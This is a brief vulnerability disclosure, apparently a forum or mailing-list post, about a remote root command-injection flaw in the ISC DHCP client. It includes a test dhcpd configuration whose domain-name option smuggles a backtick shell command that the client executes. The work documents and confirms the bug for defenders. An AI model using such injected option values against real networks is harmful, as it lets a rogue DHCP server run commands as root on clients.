The ISC dhcp client contains a remote root hole. If the DHCP server gives out addresses containing backticks, shell commands can be run on the clients.
eef34ca1565e47d927a25f800efe9a7431b1dbae5b0b5733ac6817b7b74dc94f
Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client.
I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:
shared-network LOCAL-NET {
option domain-name "my.`echo hi > /tmp/oops`.domain";
option domain-name-servers 192.168.1.3, 192.168.1.5;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
range 192.168.1.32 192.168.1.127;
}
}
... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..